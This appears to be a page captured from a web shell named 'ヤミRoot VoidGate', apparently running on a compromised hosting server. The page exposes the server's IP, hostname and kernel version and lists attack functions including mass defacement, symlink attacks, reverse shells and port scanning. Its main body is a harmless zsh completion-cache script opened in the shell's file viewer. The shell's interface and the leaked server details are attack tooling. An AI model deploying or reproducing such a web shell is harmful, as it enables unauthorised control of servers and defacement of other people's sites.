ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: _store_cache
#autoload # # Storage component of completions caching layer local _cache_ident _cache_ident_dir _cache_ident="$1" if zstyle -t ":completion:${curcontext}:" use-cache; then # Decide which directory to cache to, and ensure it exists zstyle -s ":completion:${curcontext}:" cache-path _cache_dir : ${_cache_dir:=${ZDOTDIR:-$HOME}/.zcompcache} if [[ ! -d "$_cache_dir" ]]; then if [[ -e "$_cache_dir" ]]; then _message "cache-dir style points to a non-directory\!" else # if module load fails, we *should* be okay using normal mkdir so # we load feature b:mkdir instead of b:zf_mkdir; note that modules # loaded in a sub-shell don't affect the parent. ( zmodload -F zsh/files b:mkdir; mkdir -m 0700 -p "$_cache_dir" ) 2>/dev/null if [[ ! -d "$_cache_dir" ]]; then _message "couldn't create cache-dir $_cache_dir" return 1 fi fi fi _cache_ident_dir="$_cache_dir/$_cache_ident" _cache_ident_dir="$_cache_ident_dir:h" if [[ ! -d "$_cache_ident_dir" ]]; then if [[ -e "$_cache_ident_dir" ]]; then _message "cache ident dir points to a non-directory:$_cache_ident_dir" else # See also rationale in zmodload above ( zmodload -F zsh/files b:mkdir; mkdir -m 0700 -p "$_cache_ident_dir" ) 2>/dev/null if [[ ! -d "$_cache_ident_dir" ]]; then _message "couldn't create cache-ident_dir $_cache_ident_dir" return 1 fi fi fi shift for var; do case ${(Pt)var} in (*readonly*) ;; (*(association|array)*) print -r "$var=( ${(kv@Pqq)^^var} )";; (*) print -r "$var=${(Pqq)^^var}";; esac done >! "$_cache_dir/$_cache_ident" else return 1 fi return 0
Coded With 💗 by
0x6ick